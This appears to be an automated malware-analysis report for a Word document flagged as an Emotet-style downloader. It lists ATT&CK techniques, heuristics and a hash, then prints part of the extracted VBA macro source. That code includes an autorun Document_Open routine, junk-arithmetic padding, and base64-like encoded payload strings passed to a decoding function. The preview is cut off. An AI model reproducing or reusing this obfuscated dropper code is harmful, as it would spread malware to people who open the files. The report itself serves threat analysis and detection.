Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, likely to download and execute a secondary payload. The presence of a 'macros.bas' file further supports this. The ClamAV detection ID 'Doc.Malware.Emodldr-10025032-0' suggests this is a known downloader variant.
Heuristics (6):
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45973 bytes |

SHA-256: 7db8722f4a7a6c0422c18b31ece24da2ae0446608ed88742c056a57c2ab80405

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 20 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "tfnEPKKcCUufH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
krBzW = 14533 * CDate(75936) * 10000 * 3154 * (iQtwa - Oct(46903)) + JZsYtA / CSng(WDHGp) * 63281 * CSng(HfrrKT)
Application.Run IzEvij + "SjPhiYfVj" + szmMR, Mimtq + kwRodVArUPYblb + zbTAhP
hXlBE = 30410 * CDate(9034) * 74959 * 3062 * (ncPRi - Oct(57447)) + UtYKV / CSng(swATT) * 42256 * CSng(zXjJBz)
End Sub
Attribute VB_Name = "zizNjLJz"
Sub bZVzP(nrJMwt)
DwkRM = 50705 * CDate(31703) * 93005 * 12005 * (iWGmw - Oct(21096)) + KPthZt / CSng(YZUjpz) * 78631 * CSng(NuiAc)
End Sub
Function kwRodVArUPYblb()
On Error Resume Next
oGhWbu = 69157 * CDate(7853) * 58178 * 41082 * (wVZCvA - Oct(93976)) + ijMRi / CSng(nFpRz) * 28114 * CSng(nTjmJ)
zDoLPZZV = OaWmX("pYBjAGMANQA5AGUAYgAyADgAOQBhAGUAYQA1ADgAMgA3ADcAZQAxADEAMgBjADgAMAAxAGUANwA5AGUAYQBlAGMANwAxADkANwAwADMANwBjADIAMwA5ADIAYQBmAGYANwA0ADUAYQA2AGYAOQA4ADYAZQBhADYAMwA5ADEAOABjADEAZQBmADcAMgBhADAAMwBlAGmLrPiQX", CFbnRi - CFbnRi + 3 + CFbnRi - CFbnRi, CFbnRi - CFbnRi + 196 + CFbnRi - CFbnRi)
ZNhzS = 83615 * CDate(80325) * 35746 * 62203 * (cHdYE - Oct(34576)) + bpCRn / CSng(umjGjI) * 3566 * CSng(PmiXww)
aVlpu = 80971 * CDate(25296) * 28090 * 61868 * (HYbiB - Oct(8245)) + hpmaqo / CSng(PmnMh) * 13247 * CSng(miUEH)
jjszSV = OaWmX("EfPCEAOQBiAGYAMQA1ADgAYwA3ADYAOABkADMAMQBkADQANgBkADAAMQA2AGIAYgBjADkANgAxADQAYwA0ADEAYwAzADAAOQBkADkAMQA3AGYAMQA2ADUAZQA2AGMAZQA0ADIANAAxAGYANgBmADtDf", uZomHk - uZomHk + 6 + uZomHk - uZomHk, uZomHk - uZomHk + 143 + uZomHk - uZomHk)
SFzMbL = 74935 * CDate(44945) * 99675 * 9297 * (UAVYt - Oct(76473)) + jhXZIC / CSng(hZJVp) * 13734 * CSng(uNfcrZ)
FtDQE = 531 * CDate(80284) * 22485 * 15461 * (EqcqGs - Oct(96461)) + NBrbGE / CSng(cLLub) * 31097 * CSng(SZNzsR)
IRrnXFXqSA = OaWmX("LPmGYgBjADcAMABhADAAYQAzADMAYwA4ADUAYwBhAGEAMQA1AGIAMAA0ADIAZQA4ADAAZQA4AGIAYQBmAGQAMQA0AIiP", fBqPhd - fBqPhd + 6 + fBqPhd - fBqPhd, fBqPhd - fBqPhd + 84 + fBqPhd - fBqPhd)
jpFlud = 59717 * CDate(85830) * 23019 * 75564 * (wmCPf - Oct(57803)) + wGcoiR / CSng(cPXCdG) * 98888 * CSng(zhLmpM)
tDfKE = 98666 * CDate(47260) * 28703 * 94967 * (HJUIzG - Oct(67814)) + Ynvpkb / CSng(lMcEiN) * 87052 * CSng(wGrHLi)
CFSpTsN = OaWmX("lddBhADYAZQBiADYANgAyAGQAYgAxADAANQBkADIANgBkADIANgA1AGMAMgA4Oo3", ijzYnc - ijzYnc + 4 + ijzYnc - ijzYnc, ijzYnc - ijzYnc + 58 + ijzYnc - ijzYnc)
dqMGL = 55316 * CDate(34485) * 47731 * 77839 * (SJYrHE - Oct(35533)) + kTmvK / CSng(jOVYB) * 15507 * CSng(XHGKFd)
zjzGq = 10205 * CDate(54371) * 83982 * 69154 * (uaizt - Oct(77711)) + sLwXzh / CSng(jvBjw) * 11701 * CSng(JOrKI)
UIfwkS = OaWmX("Y0AzAGMAZgAyAGIAMgA3AGUANwBmADUAMABkADUANQADUuCD", PwTnoY - PwTnoY + 3 + PwTnoY - PwTnoY, PwTnoY - PwTnoY + 41 + PwTnoY - PwTnoY)
vLJKj = 1969 * CDate(89166) * 89009 * 71908 * (aAzXKW - Oct(26864)) + zCqXv / CSng(vvdEl) * 22825 * CSng(olUfjB)
IjnkN = 46733 * CDate(7479) * 26491 * 55051 * (YAGnw - Oct(61914)) + VfmYV / CSng(qIwSZK) * 96264 * CSng(tKlji)
lCGmtjXrXw = OaWmX("MuQazaGYAOQAwAGIAMwAwADgAMwBlAGYAOAA5ADkANQBmADYANAAwAGYANwAzADEANgBmAGUANAA2ADAANwAxAGYAMwA2AGYANABkADMAYgBkADcAYgAzAGIAMwA4AGEAYQAwAGEPa", nwmNwz - nwmNwz + 7 + nwmNwz - nwmNwz, nwmNwz - nwmNwz + 129 + nwmNwz - nwmNwz)
FPuVOf = 42771 * CDate(52637) * 98534 * 22045 * (AJWXic - Oct(64946)) + tzcPFi / CSng(iPfpV) * 12956 * CSng(BzFlQ)
XWJmB = 24524 * CDate(95311) * 71353 * 51740 * (MPUfh - Oct(32616)) + zTuln / CSng(LWMhj) * 79985 * CSng(pomzaY)
nTVFkPJvT = OaWmX("QSroDAANwA5ADkANQA1AGUAYQA4ADkANwA0ADIAZABhADQAMwA2ADMANwAwADcANgAlD", pTOIm - pTOIm + 5 + pTOIm - pTOIm, pTOIm - pTOIm + 61 + pTOIm - pTOIm)
GBCXlD = 75121 * CDate(4716) * 66117 * 80051 * (fTzwEl - Oct(31234)) + GzPpfO / CSng(mTYdWF) * 17827 * CSng(CzRXAk)
mPrzFj = 37692 * CDate(16067) * 85351 * 29835 * (dmFlrn - Oct(44937)) + CHvrQ / CSng(uzSpF) * 47651 * CSng(CHFbFo)
swVXJwbWJFs = OaWmX("HDIANwA1
```

... (truncated)